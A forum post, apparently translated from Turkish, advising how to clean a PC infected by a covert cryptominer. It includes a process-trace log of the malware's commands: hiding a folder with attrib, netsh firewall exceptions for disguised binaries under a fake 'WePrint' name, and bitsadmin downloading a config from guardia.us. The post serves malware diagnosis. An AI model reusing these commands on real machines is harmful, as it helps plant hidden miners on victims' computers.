Türkçesever
Hectopat
- Joined
- 12 September 2016
- Messages
- 630
The friend should create a Bitdefender Rescue Disk, or use RKill and then an antivirus. It would also be worth generating a HerdProtect report.
<Process Name="C:\Windows\System32\attrib.exe" PID="2832" StartedInTraceSec="47.907">
<StartTime>2017/05/20:14:10:25.6971698</StartTime>
<CommandLine><![CDATA[attrib +s +a +h c:\zec]]></CommandLine>
<DiskUsage Units="bytes">54784</DiskUsage>
<CpuUsage Units="us">0</CpuUsage>
<ParentPID>7252</ParentPID>
<ParentStartTime>2017/05/20:14:10:19.4315463</ParentStartTime>
<ParentName>cmd.exe</ParentName>
</Process>
<Process Name="C:\Windows\System32\cmd.exe" PID="7252" StartedInTraceSec="41.642">
<StartTime>2017/05/20:14:10:19.4315463</StartTime>
<CommandLine><![CDATA[C:\Windows\system32\cmd.exe /c c:\zec\start.bat]]></CommandLine>
<DiskUsage Units="bytes">0</DiskUsage>
<CpuUsage Units="us">30589</CpuUsage>
<ParentPID>5712</ParentPID>
<ParentStartTime>2017/05/20:14:10:03.9668622</ParentStartTime>
<ParentName>nircmd.exe</ParentName>
</Process>
<Process Name="C:\Windows\System32\conhost.exe" PID="7364" StartedInTraceSec="41.926">
<StartTime>2017/05/20:14:10:19.7159901</StartTime>
<CommandLine><![CDATA[\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1]]></CommandLine>
<DiskUsage Units="bytes">4096</DiskUsage>
<CpuUsage Units="us">18788</CpuUsage>
<ParentPID>7252</ParentPID>
<ParentStartTime>2017/05/20:14:10:19.4315463</ParentStartTime>
<ParentName>cmd.exe</ParentName>
</Process>
<Process Name="C:\Windows\System32\conhost.exe" PID="9196" StartedInTraceSec="56.451">
<StartTime>2017/05/20:14:10:34.2408881</StartTime>
<CommandLine><![CDATA[\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1]]></CommandLine>
<DiskUsage Units="bytes">0</DiskUsage>
<CpuUsage Units="us">33777</CpuUsage>
<ParentPID>9188</ParentPID>
<ParentStartTime>2017/05/20:14:10:34.1200329</ParentStartTime>
<ParentName>OAWrapper.exe</ParentName>
</Process>
<Process Name="C:\Windows\System32\attrib.exe" PID="7308" StartedInTraceSec="50.710">
<StartTime>2017/05/20:14:10:28.4999577</StartTime>
<CommandLine><![CDATA[attrib +s +a +h c:\zec\*]]></CommandLine>
<DiskUsage Units="bytes">0</DiskUsage>
<CpuUsage Units="us">5558</CpuUsage>
<ParentPID>7252</ParentPID>
<ParentStartTime>2017/05/20:14:10:19.4315463</ParentStartTime>
<ParentName>cmd.exe</ParentName>
</Process>
<Process Name="C:\Windows\System32\netsh.exe" PID="7384" StartedInTraceSec="64.034">
<StartTime>2017/05/20:14:10:41.8241590</StartTime>
<CommandLine><![CDATA[netsh advfirewall firewall add rule name="WePrint" dir=in action=allow profile=any description="WePrint Firewall Exception" program="C:\zec\taskmgr.exe"]]></CommandLine>
<DiskUsage Units="bytes">611328</DiskUsage>
<CpuUsage Units="us">6175</CpuUsage>
<ParentPID>7252</ParentPID>
<ParentStartTime>2017/05/20:14:10:19.4315463</ParentStartTime>
<ParentName>cmd.exe</ParentName>
</Process>
<Process Name="C:\Windows\System32\netsh.exe" PID="8928" StartedInTraceSec="65.598">
<StartTime>2017/05/20:14:10:43.3880496</StartTime>
<CommandLine><![CDATA[netsh advfirewall firewall add rule name="WePrint" dir=out action=allow profile=any description="WePrint Firewall Exception" program="C:\zec\svchosts.exe"]]></CommandLine>
<DiskUsage Units="bytes">0</DiskUsage>
<CpuUsage Units="us">3033</CpuUsage>
<ParentPID>7252</ParentPID>
<ParentStartTime>2017/05/20:14:10:19.4315463</ParentStartTime>
<ParentName>cmd.exe</ParentName>
</Process>
<Process Name="C:\Windows\System32\bitsadmin.exe" PID="8536" StartedInTraceSec="69.697">
<StartTime>2017/05/20:14:10:47.4872436</StartTime>
<CommandLine><![CDATA[Bitsadmin.exe /transfer "MyZec" http://guardia.us/MyZec.txt C:\zec\config.txt]]></CommandLine>
<DiskUsage Units="bytes">0</DiskUsage>
<CpuUsage Units="us">7057</CpuUsage>
<ParentPID>7252</ParentPID>
<ParentStartTime>2017/05/20:14:10:19.4315463</ParentStartTime>
<ParentName>cmd.exe</ParentName>
</Process>
There is a group of people in Turkey who covertly make use of this mining business.